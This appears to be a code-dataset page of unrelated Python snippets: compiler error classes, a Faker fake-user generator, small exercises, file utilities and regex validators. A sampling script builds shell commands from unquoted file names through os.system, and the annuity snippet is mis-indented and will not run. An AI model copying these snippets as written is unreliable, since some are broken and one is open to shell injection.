    NOTE(review): deriving from BaseException (not Exception) means generic
    `except Exception` handlers will NOT catch this — confirm that is intended.
    """
    pass
# ANSI terminal escape codes used to colorize diagnostic messages below.
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
class VariableTypeException(Exception):
    """Fatal diagnostic: a value's type differs from the expected one.

    Prints a colored message and terminates the process (exit code -1).
    """
    def __init__(self, expected, actual, pos):
        message = 'Unexpected type expected: %s, actual: %s. Position %s' % (expected, actual, pos)
        print(FAIL + message + ENDC)
        sys.exit(-1)
class UnknownVariableException(Exception):
    """Fatal diagnostic: an unknown variable was referenced.

    Prints a colored message and terminates the process (exit code -1).
    """
    def __init__(self, variable, pos):
        message = 'Unknown variable %s. Position %s' % (variable, pos)
        print(FAIL + message + ENDC)
        sys.exit(-1)
class BinaryTypeException(Exception):
    """Fatal diagnostic: a binary operator got incompatible operand types.

    Prints a colored message and terminates the process (exit code -1).
    """
    def __init__(self, left, right, operand, pos):
        message = 'Unexpected binary operand %s, between: %s and %s. Position %s' % (operand, left, right, pos)
        print(FAIL + message + ENDC)
        sys.exit(-1)
class UnaryTypeException(Exception):
    """Fatal diagnostic: a unary operator got an incompatible operand.

    Prints a colored message and terminates the process (exit code -1).
    """
    def __init__(self, expr, operand, pos):
        message = 'Unexpected unary operand %s, for %s. Position %s' % (operand, expr, pos)
        print(FAIL + message + ENDC)
        sys.exit(-1)
class NotImplementedYetExeption(Exception):
    """Fatal diagnostic: the handler for a node is not implemented yet.

    Prints a colored message and terminates the process (exit code -1).
    """
    def __init__(self, func, node):
        message = 'For %s Function %s is not implemented' % (func, node)
        print(FAIL + message + ENDC)
        sys.exit(-1)
class UnknownStatementException(Exception):
    """Fatal diagnostic: an unrecognized statement type was encountered.

    Prints a colored message and terminates the process (exit code -1).
    """
    def __init__(self, stmt):
        message = 'Unknown statement %s' % type(stmt)
        print(FAIL + message + ENDC)
        sys.exit(-1)
|
class User:
    """A named user paired with an engagement-metrics mapping."""

    def __init__(self, name, engagement):
        self.name = name
        self.engagement = engagement

    def __repr__(self):
        return f'<User {self.name}>'
def get_user_score(user):
    """Compute and print the user's engagement score; notify when it exceeds 500.

    Prints an error message instead when the metrics dict is missing a key
    that perform_calculation requires.

    Fix: the original called perform_calculation three times per successful
    run; the score is now computed once and reused.
    """
    try:
        score = perform_calculation(user.engagement)
    except KeyError:
        print("Incorrect values provided to our calculation function")
    else:
        print(score)
        if score > 500:
            send_notification(user)
def perform_calculation(metrics):
    """Weighted engagement score: each click is worth 5 points, each hit 2.

    Raises KeyError when 'clicks' or 'hits' is missing from *metrics*.
    """
    clicks = metrics['clicks']
    hits = metrics["hits"]
    return 5 * clicks + 2 * hits
def send_notification(user):
    """Print a notification line for *user* (User objects render via __repr__)."""
    message = f'Notification sent to {user}'
    print(message)
# Demo: this user's score (151*5 + 399*2 = 1553) exceeds the 500 threshold,
# so a notification is printed as well.
my_user=User('Rolf',{'clicks':151,'hits':399})
# Alternative user that exercises the KeyError path ('clicks'/'hits' missing).
# my_user=User("Rosie",{'click':151})
get_user_score(my_user)
from faker import Faker
import sqlite3 as sqlite
# ===========================================================
# Step 3: Create 2000 users
# Step 4: The users should have the same areas as facebook register
#
# This is a demo application that shows how to create
# fake user data, based on the facebook.com register template
# mailto:ali.pala@ymail.com
# ===========================================================
class PopulateUser:
    """Populate fake users and store their data in fake.db.

    NOTE(review): the original docstring said 2000 users but the loop inserts
    1000 profiles; this text follows the code — confirm the intended size.
    """

    def fake_user_populate(self):
        """Generate fake profiles with Faker and insert them into fake.db."""
        try:
            # en_US locale drives the generated names, mails, etc.
            fake = Faker('en_US')
            # Data will be stored in fake.db.
            con = sqlite.connect('fake.db')
            cur = con.cursor()
            # Start from a clean table on every run.
            cur.execute("DROP TABLE IF EXISTS users")
            cur.execute("CREATE TABLE users(id INT, first_name TEXT, last_name TEXT, sex TEXT, mail TEXT, "
                        "password TEXT, birth_date date, tel TEXT, image TEXT)")
            # NOTE(review): fake.simple_profile() keys do not obviously match
            # the columns created above — verify the INSERT below actually
            # succeeds against this schema.
            with con:
                for _ in range(1000):
                    # Profile dict: keys become column names, one placeholder
                    # per value.
                    user_profile_dict = fake.simple_profile()
                    columns = ', '.join(user_profile_dict.keys())
                    placeholders = ', '.join('?' * len(user_profile_dict))
                    sql = 'INSERT INTO users ({}) VALUES ({})'.format(columns, placeholders)
                    cur.execute(sql, tuple(user_profile_dict.values()))
                    # Save (commit) the changes (redundant inside `with con`,
                    # kept to preserve the original per-row commit behavior).
                    con.commit()
        except Exception as e:
            # Fix: the original executed `raise` before the print, making the
            # diagnostic unreachable. Report first, then re-raise.
            print("There is something wrong", e)
            raise
# Script entry point: build the fake-user database.
if __name__ == '__main__':
    p = PopulateUser()
    p.fake_user_populate()
|
# -*- coding:utf-8 -*-
"""
判断是否为回文数(反转后与原数字相同)
@author:dell
@file: Day06_01.py
@time: 2020/01/08
"""
def reverse_num(num):
    """Return *num* with its decimal digits reversed (non-positive input -> 0)."""
    reversed_value = 0
    while num > 0:
        # Peel the last digit off num and push it onto the result.
        num, digit = divmod(num, 10)
        reversed_value = reversed_value * 10 + digit
    return reversed_value
def is_palindrome(num):
    """True when *num* reads the same forwards and backwards in base 10."""
    return num == reverse_num(num)
if __name__ == '__main__':
    # 10 reversed is 1, so this prints False.
    r = is_palindrome(10)
    print(r)
|
"""
Move all the top level files into a folder of the same name.
"""
import os
import shutil, json
def main():
    """Move every file under `content` into content/<basename>/.

    Files sharing a basename (extension stripped) are grouped into the same
    folder, and an info.json manifest listing the moved files is written into
    each folder.

    Fixes: `os.makedirs` now tolerates a folder left over from a previous run
    (exist_ok=True), and the clumsy `(fn in pairs) is False` membership test
    is replaced with dict.get.
    """
    content = 'content'
    groups = {}
    # os.walk is fully consumed before anything is moved, so the moves below
    # cannot feed back into this scan.
    for top, dirs, files in os.walk(content):
        for filepath in files:
            fn, ext = os.path.splitext(os.path.basename(filepath))
            groups[fn] = groups.get(fn, ()) + (os.path.join(top, filepath),)
    for folder, files in groups.items():
        root = os.path.join(content, folder)
        os.makedirs(root, exist_ok=True)
        for filepath in files:
            new_loc = os.path.join(root, os.path.basename(filepath))
            print('Moving', filepath, new_loc)
            shutil.move(filepath, new_loc)
        data = dict(
            root=root,
            files=files,
        )
        # Manifest describing what landed in this folder.
        with open(os.path.join(root, 'info.json'), 'w') as stream:
            json.dump(data, stream)
# Script entry point.
if __name__ == '__main__':
    main()
|
from src.Annuity import Annuity
if __name__ == "__main__":
annuity_cal_0 = Annuity(2400, 2.3, 15, 12)
annuity_cal_1 = Annuity(2400, 2.5, 20, 12)
annuity_cal_2 = Annuity(2400, 3.0, 30, 12)
print(f'15 year total is {annuity_cal_0.get_pv_ordinary_annuity()}, \n'
f'20 year total is {annuity_cal_1.get_pv_ordinary_annuity()}, \n'
f'30 year total is {annuity_cal_2.get_pv_ordinary_annuity()} \n')
|
import math

# Project Euler 20: compute the sum of the decimal digits of 100!.
N = 100
# math.factorial replaces the manual product loop; the original also shadowed
# the builtin `sum` with its accumulator and left `import math` unused.
factorial_value = math.factorial(N)

digit_sum = 0
while factorial_value != 0:
    # Peel off the last digit with divmod.
    factorial_value, digit = divmod(factorial_value, 10)
    digit_sum += digit
print(digit_sum)
# Count the number of distinct whitespace-separated words in input.txt.
# Fix: the original never closed the file handle; `with` guarantees it.
with open('input.txt', 'r', encoding='utf8') as fin:
    lines = fin.readlines()

unique_words = set()
for line in lines:
    # set.update() adds every token of the line in one call.
    unique_words.update(line.split())
print(len(unique_words))
|
"""
Select 25 random files from the results of a processing stage from a corpus.
Usage:
$ python select-random-files.py CORPUS STAGE
Writes results to a directory random/CORPUS-STAGE. All files are unzipped.
Example:
$ python select-random-sample.py \
/home/j/corpuswork/fuse/FUSEData/corpora/ln-cn-all-600k/subcorpora/1999 d2_seg
"""
import os, sys, glob, random
# Python 2 script (print statements, %-interpolated shell calls).
corpus = sys.argv[1]   # path to the corpus root
stage = sys.argv[2]    # processing-stage subdirectory to sample from
COUNT = 25             # number of files to select
corpus_name = os.path.basename(corpus)
files_dir = os.path.join(corpus, 'data', stage, '01', 'files')
results_dir = os.path.join('random', "%s-%s" % (corpus_name, stage))
print "Selecting from", files_dir
# Files are expected one level below a four-character (year) directory.
file_list = glob.glob("%s/????/*" % files_dir)
random.shuffle(file_list)
print "Collected", len(file_list), 'files'
print "Writing to", results_dir
os.mkdir(results_dir)
for fname in file_list[:COUNT]:
    (year, basename) = fname.split(os.sep)[-2:]
    print ' ', year, basename
    # NOTE(review): fname is interpolated into a shell command; paths with
    # spaces or shell metacharacters would break this — consider shutil.copy.
    os.system("cp %s %s/%s-%s" % (fname, results_dir, year, basename))
os.system("gunzip %s/*.gz" % results_dir)
|
class File:
    """Thin wrapper around a file object, closed automatically on destruction.

    NOTE(review): relying on __del__ ties cleanup to garbage collection;
    prefer a context manager (`with open(...)`) in new code.
    """

    def __init__(self, file_name, option):
        # The mode string is passed straight through to open() (e.g. 'r', 'w').
        self.file = open(file_name, option)

    def read_lines(self):
        """Return the file's remaining content as a list of lines."""
        return self.file.readlines()

    def write_lines(self, lines):
        """Write an iterable of strings to the file (no newlines added)."""
        return self.file.writelines(lines)

    def __del__(self):
        # Fix: if open() raised in __init__, self.file never existed and the
        # original __del__ raised a secondary AttributeError during cleanup.
        f = getattr(self, 'file', None)
        if f is not None:
            f.close()
# Shared record store filled by f1: one [dance, girl, boy] list per input row.
rec=[]
def f1(label):
    """1. feladat: read tancrend.txt (';'-separated fields) into the global
    rec list as [dance, girl, boy] records, then print the first and last dance.

    NOTE(review): the file handle is never closed.
    """
    print(label)
    f=open("tancrend.txt","r")
    for sor in f:
        # Strip the trailing newline, if present, before splitting.
        if sor[-1]=="\n":
            sor=sor[:-1].split(";")
        else:
            sor=sor.split(";")
        rec.append([sor[0],sor[1],sor[2]])
    txt="A fájl beolvasása...kész!"
    print("\t"+txt)
    # First and last dance names in file order.
    txt=rec[0][0]
    print("\t"+txt)
    txt=rec[-1][0]
    print("\t"+txt)
def f2(label):
    """2. feladat: list every couple that danced samba and print the count."""
    print(label)
    samba_count=0
    for sor in rec:
        if sor[0]=="samba":
            samba_count+=1
            print("\t"+sor[1]+", "+sor[2])
    txt=str(samba_count)+" pár mutatta be a sambát."
    print("\t"+txt)
def f3(label):
    """3. feladat: list every dance in which Vilma performed."""
    print(label)
    for sor in rec:
        if sor[1]=="Vilma":
            print("\t"+sor[0])
def f4(label):
    """4. feladat: ask for a dance name and report Vilma's partner for it.

    Fix: the original decided the output message inside the row loop via a
    misplaced elif — with an empty record list it re-printed the input prompt,
    and the "not danced" message was rebuilt on every non-matching row. The
    message is now chosen once, after all rows have been scanned.
    """
    print(label)
    txt="Kérek egy táncot (cha-cha, salsa, rumba, samba, jive, tango, bachata): "
    tanc=input(txt)
    par=[]
    for sor in rec:
        if sor[0]==tanc and sor[1]=="Vilma":
            par.append(sor[2])
    if par:
        txt="A "+tanc+" bemutatóján Vilma párja "+par[0]+" volt."
    else:
        txt="Vilma nem táncolt "+tanc+"-t."
    print("\t"+txt)
def f5(label):
    """5. feladat: write the sorted, unique girl and boy names to szereplok.txt.

    Fix: the original never closed the output file, so the last write could
    remain unflushed; `with` guarantees close.
    """
    print(label)
    with open("szereplok.txt","w") as f:
        # Girls come from field 1, boys from field 2; both deduplicated and sorted.
        girls=sorted(set(sor[1] for sor in rec))
        txt="Lányok: "+", ".join(girls)
        print("\t"+txt)
        f.write(txt+"\n")
        boys=sorted(set(sor[2] for sor in rec))
        txt="Fiúk: "+", ".join(boys)
        print("\t"+txt)
        f.write(txt)
    txt="A szereplok.txt fájl kiírása...kész!"
    print("\t"+txt)
f1("1. feladat")
f2("2. feladat")
f3("3. feladat")
f4("4. feladat")
f5("5. feladat") |
import re
from validation_exception import ValidationException
class UserRegisteration:
    """Regex-based field validators for user registration.

    Each checker returns True (and prints a confirmation) for valid input and
    raises ValidationException otherwise.

    Fix: when the regex matched only a prefix of the input (e.g. a name with
    a trailing digit) the original methods fell through and silently returned
    None instead of raising; every failure now raises. The bare `except`
    blocks (which existed only to convert the TypeError from subscripting a
    failed match) are gone as well.
    """
    NAME_PATTERN=r'^[A-Z][a-z]{2,20}'
    MOBILE_PATTERN=r'[0-9]{2}[ ][0-9]{10}$'
    EMAIL_PATTERN=r'^[a-z]{1}[a-z0-9]{1,}[.|_|+|-]?[a-z0-9]{1,}?@[a-z0-9]{1,}[.][a-z]{2,4}([.][a-z]{2})?$'
    PASSWORD_PATTERN=r'(?=.*?[A-Z])(?=.*?[\d])(?=.*?[^#|?|!|@|$|%|^|&|*|-]*[^#|?|!|@|$|%|^|&|*|-][#|?|!|@|$|%|^|&|*|-]*$)[a-zA-Z0-9#^?!@$%^&*-]{8,}'

    def _validate(self, pattern, value, success_message, error_message):
        # Shared helper: full-match semantics via re.match plus a whole-string
        # comparison, mirroring the original per-method logic.
        self.pattern = re.match(pattern, value)
        if self.pattern is not None and self.pattern[0] == value:
            print(success_message)
            return True
        raise ValidationException(error_message)

    #check for name validation
    def check_name_validation(self, name):
        """Names: one capital letter followed by 2-20 lowercase letters."""
        return self._validate(self.NAME_PATTERN, name, "Valid name", "Invalid Name")

    #check for mobile validation
    def check_mobile_validation(self, mobile):
        """Mobile numbers: a 2-digit country code, a space, then 10 digits."""
        return self._validate(self.MOBILE_PATTERN, mobile, "Valid Mobile Number", "Invalid Mobile Number")

    #check for email validation
    def check_email_validation(self, email):
        """Email addresses per EMAIL_PATTERN (lowercase local part, 2-4 letter TLD)."""
        return self._validate(self.EMAIL_PATTERN, email, "Valid Email Address", "Invalid Email Address")

    #check for password validation
    def check_password_validation(self, password):
        """Passwords: 8+ allowed chars with an uppercase letter, a digit, and the
        special-character constraints encoded in PASSWORD_PATTERN."""
        return self._validate(self.PASSWORD_PATTERN, password, "Valid Password", "Invalid Password")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.